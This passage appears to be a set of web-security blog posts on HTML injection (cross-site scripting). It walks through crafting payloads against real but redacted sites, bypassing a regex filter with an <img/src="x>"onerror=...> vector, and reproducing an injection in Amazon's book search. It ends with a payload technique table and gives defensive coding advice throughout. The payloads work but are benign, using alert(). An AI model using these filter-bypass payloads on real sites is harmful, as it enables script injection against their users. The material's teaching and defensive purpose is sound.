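function reflect(value) {
  return [
    "function SetLanCookie() {",
    "  var index = document.getElementById('selectorControl').selectedIndex;",
    "  var lcname = document.getElementById('selectorControl').options[index].value;",
    "  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=" + value + "';",
    "  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){",
    "    var hflanguage = document.getElementById(getClientId().HfLanguage);",
    "    hflanguage.value =  '1';",
    "  }",
    "  $.cookie('LanCookie', lcname, {path: '/'});",
    "  __doPostBack('__Page_btnLanguageLink','')",
    "}"
  ].join("\n");
}

// Return null if the text parses, otherwise the SyntaxError message.
// new Function() compiles the source but does not run it.
function syntaxErrorOf(source) {
  try {
    new Function(source);
    return null;
  } catch (e) {
    if (e instanceof SyntaxError) return e.message;
    throw e;
  }
}

// Decoded payloads from the two attempts so far.
var commentedOut = "a';alert(9)//";
var closedFunction = "a'}alert(9);var a='";

// Parses cleanly, but the alert() now lives inside SetLanCookie().
console.log(syntaxErrorOf(reflect(commentedOut)));
// Does not parse: the original closing brace of the function is left over.
console.log(syntaxErrorOf(reflect(closedFunction)));
```

The exact wording of the error differs between engines, so the sketch only distinguishes "parses" from "does not parse".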

(3) Capture the Function Body

When we remember to terminate the JavaScript string, we must also remember to capture the syntax that follows the payload. In some cases, you can get away with commenting it out with // characters. If you look at the previous code, you’ll notice that we also tried to re-capture the remainder of the string with ;var a=' inside the payload.

What needs to be done is to re-capture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to fix this attack: just update the payload with an opening function statement, as below:

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;function%28%29{var%20a=%27

The page reflects the payload once again, as shown in the following code. Spaces and carriage returns have been added to make the example easier to read. They’re unnecessary in the wild (you can minify XSS payloads, too).

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'
}
alert(9);
function(){
  var a='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

Almost there. But the pop-up remains elusive.

(4) Var Your Function

Oops. We created a function, but forgot to name it. Normally, JavaScript doesn’t care about explicit names, but an unnamed, anonymous function is only valid as an expression; a statement that starts with the function keyword must supply a name. For example, the following syntax creates and executes an anonymous function that generates an alert:

(function(){alert(9)})()

We don’t need to be that fancy, but it’s nice to remember our options. In this case, we’ll assign the function to another var. Happy syntax is executing syntax. And executing syntax kills a site’s security.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=function%28%29{var%20a=%27
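
The rule at work: a statement that begins with the function keyword is a function declaration, and a declaration must have a name. An anonymous function is legal only where an expression is expected, such as the right-hand side of an assignment or inside parentheses. A small sketch, again using new Function purely as a syntax checker (parses is a hypothetical helper name):

```javascript
// True if the engine accepts the text as a function body, false on SyntaxError.
function parses(source) {
  try {
    new Function(source);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

console.log(parses("function(){ var a=''; }"));          // false: declaration without a name
console.log(parses("function f(){ var a=''; }"));        // true: named declaration
console.log(parses("var a = function(){ var a=''; }"));  // true: anonymous function expression
console.log(parses("(function(){ var a=''; })()"));      // true: immediately invoked expression
```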

Finally, we reach a point where the payload inserts an alert() and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.) Behold the fully exploited page, with spaces added for clarity:

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'
}
alert(9);
var a = function(){
  var a ='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}
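
To replay the whole progression in one go, here is a sketch that loads each version of the script block with a stubbed alert() and counts the calls. It rests on two assumptions: the value is reflected into the template shown above, and the page never calls SetLanCookie() on load (the hypothesis from step 2). The names reflect and alertsOnLoad are made up for the example.

```javascript
// Rebuild the script block with the value reflected, unencoded, into pageUrl.
function reflect(value) {
  return [
    "function SetLanCookie() {",
    "  var index = document.getElementById('selectorControl').selectedIndex;",
    "  var lcname = document.getElementById('selectorControl').options[index].value;",
    "  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=" + value + "';",
    "  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){",
    "    var hflanguage = document.getElementById(getClientId().HfLanguage);",
    "    hflanguage.value =  '1';",
    "  }",
    "  $.cookie('LanCookie', lcname, {path: '/'});",
    "  __doPostBack('__Page_btnLanguageLink','')",
    "}"
  ].join("\n");
}

// Load the block with a counting stub in place of alert(). Only top-level
// code runs; SetLanCookie() is defined but never invoked.
function alertsOnLoad(value) {
  var calls = 0;
  try {
    var load = new Function("alert", reflect(value));
    load(function () { calls += 1; });
  } catch (e) {
    if (e instanceof SyntaxError) return "syntax error";
    throw e;
  }
  return calls;
}

var attempts = [
  "a';alert(9)//",                        // 0: valid, but alert() sits inside the uncalled function
  "a'}alert(9);var a='",                  // syntax error: leftover closing brace
  "a'}alert(9);function(){var a='",       // syntax error: function statement without a name
  "a'}alert(9);var a=function(){var a='"  // 1: alert() runs as top-level code
];
attempts.forEach(function (payload) {
  console.log(payload, "=>", alertsOnLoad(payload));
});
```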

What do you dream of? A world without HTML injection? Electric Sheep?

I wish we could have gotten rid of XSS and SQL injection long ago. I’ve written articles lamenting them. Published books about understanding them. Created scanners to find them. Yet those efforts come and go. All those moments will be lost in time, like tears in rain.

A Lesser XSS Attack Greater Than Your Regex Security

I know what you’re thinking. “Did my regex block six XSS attacks or five?” You’ve got to ask yourself one question: “Do I feel lucky?” Well, do ya, punk?

Maybe you read a few HTML injection (cross-site scripting) tutorials and think a regex solves this problem. Maybe. Let’s revisit that thinking. We’ll need an attack vector. It could be a URL parameter, form field, header, or any other part of an HTTP request.

Choose an Attack Vector

Many web apps implement a search functionality. That’s an ideal attack vector because the nature of a search box is to accept an arbitrary string, then display the search term along with any relevant results. It’s the display, or reflection, of the search term that often leads to HTML injection.

For example, the following screenshot shows how Google reflects the search term “html injection attack” at the bottom of its results page, along with the text node created in the HTML source.

[Screenshots: Google search box; Google search results; Google search HTML source]

Here’s another example that shows how Twitter reflects the search term “deadliestwebattacks” in its results page, along with the text node created in the HTML source.

[Screenshots: Twitter search; Twitter search HTML source]

Let’s take a look at another site with a search box. Don’t worry about the text (it’s a Turkish site, the words are basically “search” and “results”). First, we try a search term, “foo”, to check if the site echoes the term into the response’s HTML. Success! It appears in two places: a title attribute and a text node.

<a title="foo için Arama Sonuçları">Arama Sonuçları : "foo"</a>

Next, we probe the page for tell-tale validation and output encoding weaknesses that indicate the potential for this vulnerability to be present. In this case, we’ll try a fake HTML tag, “<foo/>”.

<a title="<foo/> için Arama Sonuçları">Arama Sonuçları : "<foo/>"</a>

The site inserts the tag directly into the response. The <foo/> tag is meaningless for HTML, but the browser recognizes that it has the correct mark-up for a self-closing tag. Looking at the rendered version displayed by the browser confirms this:

Arama Sonuçları : ""

The “<foo/>” term isn’t displayed because the browser interprets it as a tag. It creates a DOM node of <foo> as opposed to placing a literal “<foo/>” into the text node between <a> and </a>.

Inject a Payload

The next step is to find a tag with semantic meaning for a browser. An obvious choice is to try “<script>” as a search term since that’s the containing element for JavaScript.

<a title="<[removed]> için Arama Sonuçları">Arama Sonuçları : "<[removed]>"</a>

The site’s developers seem to be aware of the risk of writing raw “<script>” elements into search results. In the title attribute, they replaced the angle brackets with HTML entities and replaced “script” with “[removed]”.

A good hacker would continue to probe the search box with different kinds of payloads. Since it seems impossible to execute JavaScript within a <script> element, we’ll try JavaScript execution within the context of an element’s event handler.

Try Alternate Payloads

Here’s a payload that uses the onerror attribute of an <img> element to execute a function:

<img src="x" onerror="alert(9)">

We inject the new payload and inspect the page’s response. We’ve completely lost the attributes, but the element was preserved:

<a title="<img> için Arama Sonuçları">Arama Sonuçları : "<img>"</a>

So, let’s modify our payload a bit. We condense it to a format that remains valid (i.e. a browser interprets it and it doesn’t violate the HTML spec). This step just demonstrates an alternate syntax with the same semantic meaning.

<img/src="x"onerror=alert(9)>

[Screenshot: HTML injection payload]

Unfortunately, the site stripped the onerror handler the same way it did for the <script> tag.

<a title="<img/src="x"on[removed]=alert(9)>">Arama Sonuçları : "<img/src="x"on[removed]=alert(9)>"</a>

Additional testing indicates the site apparently does this for any of the onfoo event handlers.

Refine the Payload

We’re not defeated yet. The fact that the site is looking for malicious content implies that it’s relying on regular expressions to blacklist common attacks.

Oh, how I love regexes. I love writing them, optimizing them, and breaking them. Regexes excel at pattern matching, but fail miserably at parsing. And parsing is fundamental to working with HTML.

So, let’s unleash a mighty anti-regex hack. I’d call for a drum roll to build the suspense, but the technique is too trivial for that. All we do is add a greater than (>) symbol:

<img/src="x>"onerror=alert(9)>

[Screenshot: HTML injection payload with anti-regex]

Look what happens to the site. We’ve successfully injected an <img> tag. The browser parses the element, but it fails to load the image called “x>” so it triggers the error handler, which pops up a friendly alert.

<a title="<img/src=">"onerror=alert(9)> için Arama Sonuçları">Arama Sonuçları : "<img/src="x>"onerror=alert(9)>"</a>

[Screenshot: alert(9)]

Why does this happen? I don’t have first-hand knowledge of the specific regex, but I can guess at its intention.

HTML tags start with the < character, followed by an alpha character, followed by zero or more attributes (with tokenization properties that create things like name/value pairs), and close with the > character. It’s likely the regex was only searching for “on…” handlers within the context of an element, i.e. between < and > (the start and end tokens). A > character inside an attribute value doesn’t close the element.

<tag attribute="x>"...onevent=code>

The browser’s parsing model understood the quoted string was a value token. It correctly handled the state transitions between element start, element name, attribute name, attribute value, and so on. The parser consumed each character and interpreted it based on the context of its current state.

The site’s poorly-formed regex didn’t create a sophisticated enough state machine to handle the “x>” properly. (Regexes have their own internal state machines for pattern matching. I’m referring to the pattern’s implied state machine for HTML.) It looked for a start token, then switched to consuming characters until it found an event handler or encountered an end token — ignoring the possible interim states associated with tokenization based on spaces, attributes, or invalid markup.
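
To make the guess concrete, here is a sketch of a filter that behaves the way the site did for these two payloads. To be clear, this is a hypothetical regex written to reproduce the observed output, not the site's actual code; naiveEventFilter is an invented name. It scans from < across anything that is not >, and blanks out the name of any on* handler it meets along the way.

```javascript
// HYPOTHETICAL filter, reconstructed from the site's observed behavior.
// "<", then any run of non-">" characters, then an on* attribute name
// followed by "=". The handler name after "on" is replaced.
function naiveEventFilter(input) {
  return input.replace(/(<[^>]*\bon)\w+(?==)/gi, "$1[removed]");
}

console.log(naiveEventFilter('<img/src="x"onerror=alert(9)>'));
// <img/src="x"on[removed]=alert(9)>

console.log(naiveEventFilter('<img/src="x>"onerror=alert(9)>'));
// <img/src="x>"onerror=alert(9)>
```

The pattern treats the first > as the end of the element, so it stops looking at x> and never reaches onerror. The browser's tokenizer is still inside a quoted attribute value at that point and keeps going.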

This was only a small step into the realm of HTML injection. For example, the web site reflected the payload on the immediate response to the attack’s request. In other scenarios the site might hold on to the payload and insert it into a different page. It’s still reflected by the site, but not on the immediate response. That would make it a persistent type of vuln because the attacker does not have to re-inject the payload each time the affected page is viewed. For example, lots of sites have phrases like, “Welcome back, Mike!”, where they print your first name at the top of each page. If you told the site your name was “<script>alert(9)</script>”, then you’d have a persistent HTML injection exploit.

Rethink Defense

For developers:

  • When user-supplied data is placed in a web page, encode it for the appropriate context. For example, use percent-encoding (e.g. < becomes %3c) for an href attribute; use HTML entities (e.g. < becomes &lt;) for text nodes.
  • Prefer inclusion lists (match what you expect) to exclusion lists (predict what you think should be blocked).
  • Work with a consistent character encoding. Unpredictable transcoding between character sets makes it harder to ensure validation filters treat strings correctly.
  • Prefer parsing to pattern matching. However, pre-HTML5 parsing has its own pitfalls, such as browsers’ inconsistent handling of whitespace within tag names. HTML5 codified explicit rules for acceptable markup.
  • If you use regexes, test them thoroughly. Sometimes a “dumb” regex is better than a “smart” one. In this case, a dumb regex would have just looked for any occurrence of “onerror” and rejected it.
  • Prefer to reject invalid input rather than massage it into something valid. This avoids a cuckoo-like attack where a single-pass filter would remove any occurrence of the word “script” from a payload like “<scrscriptipt>”, unintentionally creating a <script> tag.
  • Prefer to reject invalid character code points (and unexpected encoding) rather than substitute or strip characters. This prevents attacks like null-byte insertion, e.g. stripping null from <%00script> after performing the validation check; overlong UTF-8 encoding, e.g. %c0%bcscript%c0%be; or Unicode encoding (when expecting UTF-8), e.g. %u003cscript%u003e.
  • Make sure to escape metacharacters correctly.
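
A few of these points fit in a short sketch: encoding per context, the cuckoo-style failure of a single-pass strip, and rejecting input against an inclusion list. The function names are invented for the example, and the inclusion list (letters, digits, spaces) is an arbitrary assumption; a real site would pick rules that match its own data.

```javascript
// Text-node context: entity-encode the characters that start markup.
function encodeForTextNode(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// URL query-value context: percent-encode with the built-in function.
function encodeForQueryValue(text) {
  return encodeURIComponent(String(text));
}

// The single-pass "massage" filter the list warns about.
function stripScriptOnce(input) {
  return input.replace(/script/gi, "");
}

// Rejecting instead of repairing. This inclusion list (letters, digits,
// spaces, 1 to 64 characters) is an arbitrary choice for the example.
function isExpectedSearchTerm(input) {
  return /^[A-Za-z0-9 ]{1,64}$/.test(input);
}

console.log(encodeForTextNode("<foo/>"));                   // &lt;foo/&gt;
console.log(encodeForQueryValue("<foo/>"));                 // %3Cfoo%2F%3E
console.log(stripScriptOnce("<scrscriptipt>"));             // <script>
console.log(isExpectedSearchTerm("<scrscriptipt>"));        // false
console.log(isExpectedSearchTerm("html injection attack")); // true
```

Note that the two encoders are not interchangeable: each one is only correct for the context named in its comment.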

For more examples of payloads that target different HTML contexts or employ different anti-regex techniques, check out the HTML Injection Quick Reference (HIQR). In particular, experiment with different payloads from the “Anti-regex patterns” at the bottom of Table 2.


My Zombie Incursion into Amazon.com

This is how it began. Over two years ago I unwittingly planted the seeds of an undead horde into the pages of my book, Seven Deadliest Web Application Attacks. Only recently did I discover the rotted fruit of those seeds festering within the pages of Amazon.

  • Visit the book’s Amazon page.
  • Click on the “Look Inside!” feature.
  • Use the “Search Inside This Book” function to search for zombie.
  • Cower before the approaching mass of flesh-hungry brutes. Or just click OK a few times.

(Note that Internet Explorer 9 might repel the attack.)

On page 16 of the book there is an example of an HTML element’s syntax that forgoes the typical whitespace used to separate attributes. The element’s name is followed by a valid token separator, albeit one rarely used in hand-written HTML. The printed text contains this line:

<img/src="."alt=""onerror="alert('zombie')"/>

The “Search Inside” feature lists the matches for a search term. It makes the search term bold (i.e. adds <b> markup) and includes the context in which the search term was found (hence the surrounding text with the full <img/src="."alt="" /> element). Then it just pops the contextual find into the list, to be treated as any other “text” extracted from the book.

<img src="." alt="" onerror="alert('<b>zombie</b>')"/>

Finally, the matched term is placed within an anchor so you can click on it to find the relevant page. Notice that the <img> tag hasn’t been inoculated with HTML entities; it’s a classic HTML injection attack.

<a class="sitbReader-result-link sitbReader-link-visited sitbReader-link-selected" onclick="SitbReader.RefTag.post(SitbReader.RefTag.Actions.searchResult,SitbReader.RefTag.LandingPage.excerpt); SitbReader.SearchActions.goToSearchResult(2)" href="javascript:void(0)"><span class="sitbReaderSearch-result-page">Page 16 ...t require spaces to delimit their attributes. <img src="." alt="" onerror="alert('<b>zombie</b>')"/> JavaScript doesn't have to...

This has actually happened before. In December 2010 a researcher in Germany, Dr. Wetter, reported the same effect via <script> tags when searching for content in different security books. He even found <script> tags whose src attribute pointed to a live host, which made the flaw infinitely more entertaining.

In fact, this was such a clever example of an unexpected vector for HTML injection that I included Dr. Wetter’s findings in the new Hacking Web Apps book (pages 40 and 41, the same <img…onerror> example shows up a little later on page 59). Behold, there’s a different infestation on page 31. Try searching for zombie again. This time the server responds with a JSON payload that contains straightforward <script> tags. This one was more tedious to track down. The <script> tags don’t appear in the search listing, but they do exist in the excerpt property of the JavaScript object that contains the matches (with bold tags applied, etc.):

{...,"totalResults":2,"results":[[52,"Page 31","... encoded characters with their literal values:  <a href=\"http://\"/><script>alert('<b>zombie</b>')</script>@some.site/\">search again</a>   Abusing the authority component of a ...", ...}

I only discovered this injection flaw when I recently searched the older book for references to the living dead. (Yes, a weird -- but true -- reason.)

How did this happen?

One theory is that an anti-XSS filter relied on a blacklist to catch potentially malicious tags. In this case, the <img> tag used a valid, but uncommon, token separator that would have confused any filter expecting whitespace delimiters. One common approach to regexes is to build a pattern based on what we think browsers know. For example, a quick filter to catch <script> tags or opening tags (e.g. <iframe src...> or <img src...>) might look like this:

<[[:alpha:]]+(\s+|>)

A payload like <img/src> bypasses the regex and the browser correctly parses the syntax to create an image element. Of course, the src attribute fails to resolve, thereby triggering the onerror event handler, leading to yet another banal alert() declaring the presence of an HTML injection attack.
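
The bypass is easy to reproduce. JavaScript regexes have no POSIX character classes, so this sketch swaps [[:alpha:]] for [A-Za-z]; otherwise it is the quick filter quoted above, which is itself only a guess at what a site might use.

```javascript
// The quick filter from the text, with [[:alpha:]] written as [A-Za-z]
// because JavaScript does not support POSIX classes.
var tagFilter = /<[A-Za-z]+(\s+|>)/;

var samples = [
  "<script>",                                  // caught: name followed by ">"
  '<img src="." alt="" onerror="alert(9)"/>',  // caught: name followed by a space
  '<img/src="."alt=""onerror="alert(9)"/>'     // missed: name followed by "/"
];
samples.forEach(function (sample) {
  console.log(tagFilter.test(sample), sample);
});
```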

The <script> example is less clear without knowing more about the internals of the site. Perhaps a sequence of stripping quotes and buggy regexes misunderstood the href to actually contain an authority section? I don't have a good guess for this one.

This highlights one problem of relying on regexes to parse a grammar like HTML. Yes, it's possible to create strong, effective regexes. However, a regex does not represent the parsing state machine of browsers, including their quirks, exceptions, and "fix-up" behaviors. Fortunately, HTML5 brings a measure of sanity to this mess by clearly defining rules of interpretation. On the other hand, web history foretells that we'll be burdened with legacy modes and outdated browsers for years to come. So, be wary of those regexes.

No, how did this really happen?

Well, I listen to various music while I write. You might argue that it was the demonic influence (or awesome Tony Iommi riffs) of Black Sabbath that ensorcelled the pages or that Judas Priest made me do it. Or that March 30, 2010 -- right around the book's release -- was a full moon. Maybe in one of Amazon's vast, diversely stocked warehouses an oil drum with military markings spilled over, releasing a toxic gas that infected the books. Me? I think we'll never know.

Maybe one day we'll be safe from this kind of attack. HTML5 and Content Security Policy make more sandboxes and controls available for implementing countermeasures. But I just can't shake the feeling that somehow, somewhere, there're more lurking about.

Until then, the most secure solution is to -- oh, one moment please, there's a noise at the door.

They're coming to get you, Barbara.

Stop Building HTML on the Server

Many web sites conceptually fit into the Model-View-Controller (MVC) design pattern despite (or often in spite of) the site’s actual code design. The server pieces together user data, state data, and other bits of HTML to send to the browser. One of the biggest frustrations with automating web app testing is dealing with poorly written web applications, especially the “View” — the HTML to be shown in the browser. A brief list of complaints includes: HTML with typos, outright invalid HTML, HTTP headers omitted, headers incorrect, strange state mechanisms, and weird case sensitivity issues.

Blackbox scanning fundamentally interacts only with content (HTML) and transport (HTTP and its accompanying statefulness as created by cookies). A scanner primarily bases its understanding of a web application on the site’s conceptual View. Whitebox testing, e.g. source code scanning, has more insight into the application’s functionality and can therefore more easily find vulns in our conceptually defined Model and Controller components that reside on the server.

HTML injection (a.k.a. XSS) is probably the best example of vulnerabilities that arise due to View problems. For those few still unfamiliar with the term: HTML injection occurs when data to be displayed in a web page ends up modifying the page’s underlying structure. The structure is referred to as the Document Object Model (DOM). For example, a text node expecting to hold the user’s first name may unintentionally turn into a script node when the user’s name becomes “<script>alert(0)</script>” instead of “Trudy”.

The DOM also changes when characters like extraneous quotes appear in the syntax of href or input value attributes, for example:

<a href="http://web.site/search.page?s=cars"onMouseover=alert(0);a="">Search again</a>

Zip Code:<input name=zip_code value='90210'onMouseover=alert(0);a=''>

In the two previous cases the data, a search string and a zip code, changed the page’s structure by adding an onMouseover attribute (with innocuous payload, yawn) to the anchor and input tags. The data wasn’t even intended to be displayed to the user, yet it is used in a way that pollutes the View.
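
The zip code case can be sketched in a few lines. The helper names are hypothetical, and the template is only a guess at how such a page might assemble the field; the point is what happens to the attribute delimiters with and without encoding.

```javascript
// Encode the characters that can end a quoted attribute value or start markup.
function escapeAttribute(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Build the input field, optionally encoding the value first.
function zipField(zip, encode) {
  var value = encode ? escapeAttribute(zip) : zip;
  return "<input name=zip_code value='" + value + "'>";
}

var hostile = "90210'onMouseover=alert(0);a='";

console.log(zipField(hostile, false));
// <input name=zip_code value='90210'onMouseover=alert(0);a=''>

console.log(zipField(hostile, true));
// <input name=zip_code value='90210&#39;onMouseover=alert(0);a=&#39;'>
```

In the first output the injected apostrophe ends the value early, so the element gains onMouseover and a attributes. In the second, the only apostrophes left are the two delimiters the template wrote itself.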

Ah, so we’ve finally come back to that concept: the View. Now we get to mention frameworks. Specifically, JavaScript-based browser development frameworks like Dojo, Ext JS, Prototype, and YUI. These frameworks help move the uninteresting part of the UI Controller into the browser. In other words, the server doesn’t have to care about the visual effects of dragging and dropping an email message between folders, displaying data in a tree view, sorting a list, or other interactions that take place in the browser.

JavaScript frameworks enable the site’s UI (its View) to be well-separated from the server-side processing. It should follow that the web site can create a simpler, stricter set of functions that operate on well-defined data.

In other words, the server exposes APIs that respond to very small, atomic requests with very small, atomic responses. The server no longer has to deal with writing complete HTML pages for every response. This doesn’t absolve the server from dealing with encoding issues, but it centralizes the problem more cleanly because functions can be better focused on a single purpose. For example, a drag and drop of an email between folders in a browser requires an API call that verifies access to the message, its source and destination, and updates the message’s state. The server can respond as simply as “succeeded” or “failed” and leave the HTML updating to the browser’s JavaScript library.
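
As a rough sketch of what such an atomic call might look like on the server, consider the drag-and-drop example. Everything here is hypothetical (the in-memory maps, the moveMessage name, the shape of the response); the only point is that the handler checks access, source, and destination, updates state, and answers with a tiny fixed-shape object rather than a page of HTML.

```javascript
// Hypothetical in-memory state; a real site would consult its own data store.
var messages = new Map([[42, { owner: "trudy", folder: "inbox" }]]);
var folders = new Map([["trudy", ["inbox", "archive"]]]);

// Handle "move message" and answer with a small, fixed-shape object.
// No HTML is produced here; the browser decides how to redraw.
function moveMessage(user, messageId, source, destination) {
  var message = messages.get(messageId);
  var userFolders = folders.get(user) || [];
  var allowed =
    message !== undefined &&
    message.owner === user &&
    message.folder === source &&
    userFolders.indexOf(destination) !== -1;
  if (!allowed) return { status: "failed" };
  message.folder = destination;
  return { status: "succeeded" };
}

console.log(JSON.stringify(moveMessage("trudy", 42, "inbox", "archive")));
// {"status":"succeeded"}
console.log(JSON.stringify(moveMessage("mallory", 42, "archive", "inbox")));
// {"status":"failed"}
```

Because the response never echoes user data, there is nothing in it for an attacker to inject into.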

Design vs. Implementation

Adopting a browser-side framework entails a significant amount of design effort (in terms of both visual style and software). This design effort can have several positive side-effects, including a reduction in the kinds of implementation errors that lead to HTML injection vulnerabilities. For example, the server can concern itself with ensuring a consistent encoding format for all output and the browser can display that output using well-defined, centralized functions. This is a far cry from ad-hoc HTML generation on the server. While software will always suffer from typos and bugs, a framework at least provides the tools to make a web site more secure by default.

There are some other areas where frameworks quite easily improve design security: CSRF and click-jacking countermeasures. Several frameworks have built-in countermeasures for these two types of attacks. Keep in mind that the countermeasures may not provide complete protection, but the defenses they provide are infinitely better than zero if your site currently lacks any defense and most likely better than a home-grown countermeasure based on an incomplete understanding of the problem.1 After all, the framework’s countermeasures have been designed and tested by a large group of developers. Some of them even know a thing or two about security.

Right now frameworks largely rely on JavaScript-based tricks to block CSRF and click-jacking rather than more reliable Header-based ones that recent browsers provide. Of course, it’s a bit early to expect the majority of users’ browsers to include the Origin header2 so this still favors frameworks. (The Origin header is a more reliable version of the Referer header and as such can thwart CSRF attacks. And before you write in with nifty counterexamples of all the ways the Origin header can fail and shouldn’t be trusted, make sure your example doesn’t require an HTML injection, a.k.a. XSS, exploit as well — that’s a different problem.) Conversely, web sites can add click-jacking protection by setting the X-Frame-Options header3, but the number of users with browsers that would benefit is still limited.
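
For comparison, the header-based versions are small. The sketch below is an illustration under assumptions, not a complete defense: antiFramingHeaders and originVerdict are hypothetical names, the request headers are assumed to arrive as an object with lowercased names (as Node's http module provides them), and requests without an Origin header are left for some other CSRF countermeasure to judge.

```javascript
// Response header that tells supporting browsers not to render the page in a frame.
function antiFramingHeaders() {
  return { "X-Frame-Options": "DENY" };
}

// Classify a state-changing request by its Origin header. Browsers that do
// not send the header produce "no-origin-header", which this sketch does
// not try to resolve.
function originVerdict(requestHeaders, siteOrigin) {
  var origin = requestHeaders["origin"];
  if (origin === undefined) return "no-origin-header";
  return origin === siteOrigin ? "same-origin" : "cross-origin";
}

console.log(antiFramingHeaders());
console.log(originVerdict({ origin: "https://web.site" }, "https://web.site"));    // same-origin
console.log(originVerdict({ origin: "https://evil.example" }, "https://web.site")); // cross-origin
console.log(originVerdict({}, "https://web.site"));                                 // no-origin-header
```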

Frameworks do not always reduce design errors. Obviously, they have no bearing on server-side design or implementation. User impersonation, data access controls, and authorization will not magically improve. A richer UI might introduce more complex interactions between data and user objects, which implies more chances for security failures.

JavaScript frameworks make the automated analysis of sites more difficult. Web application scanners have trouble testing them and even manually-aided tools like Selenium run into problems with dynamically changing DOMs. We’ll cover those issues in more detail in a separate post. Until then, consider introducing a browser development framework into your site in order to better consolidate server-side processing to a discrete set of APIs and leave HTML manipulation to the browser.

=====
1 You could always start with a book.
2 https://wiki.mozilla.org/Security/Origin
3 http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx

HTML Injection Quick Reference

The Book takes care to explain the elevation of Cross-Site Scripting (XSS) to the title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.

In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload. It could be anything from a while loop to lock the browser, e.g. while(1){a=1;}, or something more useful that a creative attacker comes up with. You can quite easily find “XSS Cheat Sheets” elsewhere. The intent of this reference is to instill a sense of methodology into finding HTML injection vulnerabilities. Good exploits take advantage of HTML syntax and browser quirks in creative ways. Take the time to experiment with simple payloads and observe how (and where) the web application reflects them. Then turn towards the list of complex attacks on a cheat sheet.

Also notice how the syntax of elements and JavaScript has been preserved in cases where single- or double-quotes are used to prefix a payload. The injected quote prematurely ends a quoted string, which means there will be a dangling quote at the end. Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by throwing in an extra variable definition with an open quote:

;a="

The dangling quote will close the delimiter and, in most cases, the syntax will be preserved. This type of closure isn’t really necessary for an exploit to work, but it’s a sign of craftier exploits.
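
Inside a JavaScript block the dangling quote does have to go somewhere, and there is more than one way to deal with it. A minimal sketch, assuming the value is reflected between double quotes in a string assignment like the lastLink example in the table; parses and reflectInString are hypothetical helpers, and new Function is used only to ask the engine whether the text is valid syntax.

```javascript
// True if the engine accepts the text as a function body, false on SyntaxError.
function parses(source) {
  try {
    new Function(source);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// The value is written, unencoded, between double quotes in a script block.
function reflectInString(value) {
  return 'var lastLink = "http://web.site/index?refurl=' + value + '";';
}

// Dangling quote ignored: it opens a string that never ends.
console.log(parses(reflectInString('";alert(9)')));            // false
// Dangling quote commented out.
console.log(parses(reflectInString('";alert(9)//')));          // true
// Dangling quote consumed by an extra variable definition.
console.log(parses(reflectInString('";{alert(9)}var foo="'))); // true
```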

The table’s layout is a bit constrained by the format of this post. Keep an eye on it for updates to content as well as presentation.

Technique: Close a start tag in order to insert a new element
(This usually happens within an element attribute, but keep in mind HTML comments and XML CDATA.)
Characters: >   />   -->   ]]>
Payload Example: ><script>☣</script>
Injection Example: <input type=text name=id value=><script>☣</script>>

Technique: Insert an end tag in order to insert a new element
(Also useful where XML appears, such as RSS feeds.)
Characters: </element>   ]]>
Payload Example: ]]><script>☣</script>
Injection Example: <INFO><![CDATA[]]><script>☣</script>

Technique: Close a quoted attribute in order to insert an intrinsic event
Characters: " (ASCII 0x22)   ' (ASCII 0x27)
Payload Example: "onEvent=☣;a="
Injection Example: <a href="/redir?url=http://"onClick=☣;a="">

Technique: Break out of a JavaScript variable
Characters: " (ASCII 0x22)   ' (ASCII 0x27)
Payload Example: ";{☣}var foo="
Injection Example:
<script>
var host = window.location;
var lastLink = "http://web.site/index?refurl=";{☣}var foo="";
</script>

Technique: Split payload across multiple reflection points
(Also a good way to bypass filters. Use HTML comment delimiters to elide content between the two payloads. In some cases you might be able to use quoted strings to elide content.)
Characters: (as above)
Payload Example: 1: "<script<!--   2: -->>☣</script>
Injection Example: <input value=""<script<!-- ">other content <input value=" -->>☣</script>

Technique: Alter MIME interpretation of uploaded file
(Usually when content is expected to be served as text/plain, binary, or other non-HTML type)
Characters: Must be able to influence Content-Type header or browser’s MIME sniffing algorithm
Payload Example: text/html   application/x-javascript
Injection Example: Uploaded file contains JavaScript. Image EXIF data contains HTML & JavaScript.

Technique: Bypass a filter using browser quirk
Characters: Alternate whitespace character; non-standard element or attribute
Payload Example: -
Injection Example: See http://x86.cx/html5/ for an example of a complex src attribute for an img element.

Technique: Bypass a filter using alternate or invalid character encoding
